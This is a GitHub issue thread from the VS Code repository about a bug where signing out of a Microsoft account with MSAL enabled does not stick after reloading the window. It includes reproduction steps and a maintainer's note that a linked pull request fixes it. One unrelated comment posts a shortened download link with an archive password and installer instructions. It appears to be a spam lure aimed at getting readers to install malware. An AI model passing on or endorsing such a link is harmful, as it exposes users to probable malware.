### ISSUE TITLE
Signing out of Microsoft account takes multiple attempts (MSAL)

### ISSUE THREAD

**Issue by 50Wliu** [microsoft/vscode#226798]
Does this issue occur when all extensions are disabled?: N/A

Version: 1.93.0-insider (user setup)
Commit: ff7a154d5e5e9034914f0466420f0f1407f0c95e
Date: 2024-08-27T05:04:20.235Z
Electron: 30.4.0
ElectronBuildId: 10073054
Chromium: 124.0.6367.243
Node.js: 20.15.1
V8: 12.4.254.20-electron.0
OS: Windows_NT x64 10.0.27693

After signing out of my Microsoft account, I expect to be fully logged out, but upon reloading the window I see that I have been signed back in. I only see this when MSAL is enabled.

Steps to Reproduce:

1. Enable MSAL
2. Log out of Microsoft account
3. Reload window
4. See that you're logged into your Microsoft account again (lots of accounts say "Grant access", not "Sign in")

Logs: https://gist.github.com/50Wliu/506750a786735c02fdf924e929fe7bbc

https://github.com/user-attachments/assets/6788ff6b-d37e-47c1-ba90-5c0a171a661c

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by TylerLeonhardt** [comment]
Fixed in https://github.com/microsoft/vscode/pull/227854 I'm pretty sure.
